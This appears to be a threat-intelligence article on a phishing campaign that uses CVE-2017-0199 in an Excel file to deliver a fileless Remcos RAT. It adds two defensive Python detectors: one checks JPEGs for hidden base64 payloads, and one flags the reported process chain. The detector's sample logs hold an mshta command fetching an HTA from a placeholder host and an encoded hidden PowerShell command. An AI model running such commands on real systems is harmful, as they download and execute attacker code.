A recent advanced malware campaign uses a phishing attack to deliver a seemingly benign Excel file that exploits CVE-2017-0199.
By exploiting this vulnerability in Microsoft Office, attackers are able to embed malicious code within the file using OLE objects.
The file uses encryption and obfuscation techniques to hide the malicious payload. Upon opening it, the victim's system executes a fileless variant of the Remcos RAT, granting attackers remote access and control.
The malware campaign leverages the CVE-2017-0199 vulnerability to deliver a Remcos RAT via a phishing email containing an encrypted Excel file.
The attack chain involves OLE object exploitation, HTA application execution, and PowerShell commands to inject the RAT into a legitimate process. The same vulnerability has been exploited by various malware families, including LATENTBOT, FINSPY, and WingBird/FinFisher.


Recent campaigns in 2024 deploying RevengeRAT, SnakeKeylogger, GuLoader, AgentTesla, and FormBook have targeted the Government, Manufacturing, Technology/IT, and Banking sectors, primarily in Belgium, Japan, the United States, South Korea, Canada, Germany, and Australia.
The campaign uses a spearphishing attachment to entice victims into opening a deceptive Excel document, which exploits a vulnerability (CVE-2017-0199) to execute embedded OLE objects that contain a malicious URL.
This URL initiates a connection to a malicious server, downloading and executing a weaponized HTA file, ultimately compromising the victim's system.


The Excel file exploits CVE-2017-0199 to deliver a malicious HTA application, which in turn executes a PowerShell script that downloads and runs a VBScript from a remote URL. The VBScript contains obfuscated data that is decoded and executed by PowerShell, initiating a chain of PowerShell processes to escalate the attack.
The final process downloads a JPEG file containing a base64-encoded 'dnlib.dll' library, which is decoded and loaded into memory for further malicious activity, using various techniques to evade detection and achieve persistence in the target environment.
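The JPEG stage described above works because image viewers ignore anything after the JPEG End-Of-Image marker, so a base64 blob can ride along behind a valid picture. The following check, an added example that is not part of the Trellix report or this article, pulls out any trailing data after the last EOI marker and tests whether it is base64 that decodes to a PE image (the 'MZ' DOS header shared by every .exe/.dll). The sample JPEG and the 'MZ' stand-in payload are constructed inline; no real dnlib.dll or campaign artifact is used.

```python
import base64
import re

JPEG_SOI = b"\xff\xd8"  # Start-Of-Image marker
JPEG_EOI = b"\xff\xd9"  # End-Of-Image marker; decoders stop reading here

# base64 alphabet plus line breaks (payloads are often wrapped)
_B64_RE = re.compile(rb"^[A-Za-z0-9+/=\r\n]+$")


def trailing_data_after_eoi(blob: bytes) -> bytes:
    """Return every byte that follows the last JPEG End-Of-Image marker."""
    if not blob.startswith(JPEG_SOI):
        raise ValueError("not a JPEG (missing SOI marker)")
    idx = blob.rfind(JPEG_EOI)
    if idx == -1:
        raise ValueError("no EOI marker found")
    return blob[idx + len(JPEG_EOI):]


def analyze_jpeg(blob: bytes) -> dict:
    """Flag a JPEG that carries a base64-encoded PE file behind its EOI marker."""
    trailer = trailing_data_after_eoi(blob).strip()
    result = {"trailer_bytes": len(trailer), "looks_base64": False, "decodes_to_pe": False}
    if not trailer:
        return result  # a clean image has nothing after EOI
    # short trailers (a few bytes of padding) are common and not worth flagging
    if _B64_RE.match(trailer) and len(trailer) >= 64:
        result["looks_base64"] = True
        try:
            decoded = base64.b64decode(trailer)
        except ValueError:  # binascii.Error is a ValueError subclass
            return result
        # 'MZ' is the DOS header magic at offset 0 of every PE executable/DLL
        result["decodes_to_pe"] = decoded[:2] == b"MZ"
    return result


# --- constructed samples (not real files from the campaign) ---
CLEAN_JPEG = JPEG_SOI + b"\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + JPEG_EOI
FAKE_PE = b"MZ" + b"\x90" * 126  # stand-in for a PE file; only the header magic matters here
STEGO_JPEG = CLEAN_JPEG + b"\n" + base64.b64encode(FAKE_PE) + b"\n"

if __name__ == "__main__":
    print("clean:", analyze_jpeg(CLEAN_JPEG))
    print("with payload:", analyze_jpeg(STEGO_JPEG))
```

In a mail gateway or sandbox pipeline the same function can be run over every image an Office-spawned PowerShell process downloads; a JPEG whose trailer decodes to an 'MZ' header is a strong signal regardless of what the picture shows.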


This stage begins with PowerShell downloading a base64-encoded text file from a malicious URL, which is then processed by 'dnlib.dll' to build a .NET assembly of Remcos RAT; that assembly is subsequently injected into the legitimate process 'RegAsm'.
According to Trellix, Remcos RAT then establishes persistence by injecting itself into other legitimate processes, evading traditional security defenses.
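The chain above (Excel to HTA host, HTA to PowerShell, PowerShell to PowerShell, PowerShell to RegAsm) is visible in process-creation telemetry long before the RAT is decoded in memory. The following detector is an added example, not code from Trellix or from this article: it parses constructed Sysmon-style process-creation lines (tab-separated key=value fields, an assumed layout) and raises an alert for each parent/child pair from the reported chain, plus a separate alert for an encoded PowerShell command line. The paths, the placeholder URL `example.invalid`, and the encoded string are all constructed sample data.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Parent -> child pairs taken from the attack chain described in the report.
SUSPICIOUS_PAIRS: Dict[Tuple[str, str], str] = {
    ("excel.exe", "mshta.exe"): "Excel spawned the HTA host (OLE / CVE-2017-0199 pattern)",
    ("mshta.exe", "powershell.exe"): "HTA spawned PowerShell",
    ("powershell.exe", "powershell.exe"): "chained PowerShell stages",
    ("powershell.exe", "regasm.exe"): "PowerShell spawned RegAsm, the reported injection host (T1055)",
}

# PowerShell switches that hide the real command behind base64 (T1027)
ENCODED_CMD_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")


def parse_event(line: str) -> Dict[str, str]:
    """Split one 'Key=Value<TAB>Key=Value' event line into a dict."""
    fields: Dict[str, str] = {}
    for part in line.rstrip("\n").split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path: str) -> str:
    # ntpath handles Windows separators even when this runs on Linux
    return ntpath.basename(path).lower()


def detect(events: List[str]) -> List[str]:
    """Return one human-readable alert per suspicious observation."""
    alerts: List[str] = []
    for line in events:
        if not line.strip():
            continue
        ev = parse_event(line)
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        reason = SUSPICIOUS_PAIRS.get((parent, child))
        if reason:
            alerts.append(f"{parent} -> {child}: {reason}")
        if child == "powershell.exe" and ENCODED_CMD_RE.search(ev.get("CommandLine", "")):
            alerts.append(f"{child}: encoded command line (T1027)")
    return alerts


# --- constructed sample telemetry (not real campaign logs) ---
SAMPLE_EVENTS = [
    "EventID=1\tParentImage=C:\\Windows\\explorer.exe"
    "\tImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "\tCommandLine=EXCEL.EXE invoice.xlsx",
    "EventID=1\tParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
    "\tImage=C:\\Windows\\System32\\mshta.exe"
    "\tCommandLine=mshta.exe http://example.invalid/stage.hta",
    "EventID=1\tParentImage=C:\\Windows\\System32\\mshta.exe"
    "\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tCommandLine=powershell.exe -w hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVlc=",
    "EventID=1\tParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tImage=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
    "\tCommandLine=RegAsm.exe",
    "EventID=1\tParentImage=C:\\Windows\\explorer.exe"
    "\tImage=C:\\Windows\\System32\\notepad.exe\tCommandLine=notepad.exe",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The pair table is deliberately small and specific to this chain; in production the same structure is usually widened to any Office binary spawning a script host, and RegAsm without command-line arguments under a PowerShell parent is worth its own high-severity rule because the legitimate tool is almost never launched that way.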


Indicators of Remcos RAT presence include its keylogger file and related IOCs, which correspond to the MITRE ATT&CK techniques T1055.001, T1027, T1543.003, and T1071.001.
Attackers used a combination of advanced techniques to create a persistent threat by leveraging a vulnerability (CVE-2017-0199) in Microsoft Office to execute malicious code.
They then downloaded additional tools such as OLE objects, memory-only .NET assemblies, and scripts (.hta, vbs.txt) from compromised servers, which likely helped the attackers maintain persistence on the infected system and potentially steal data.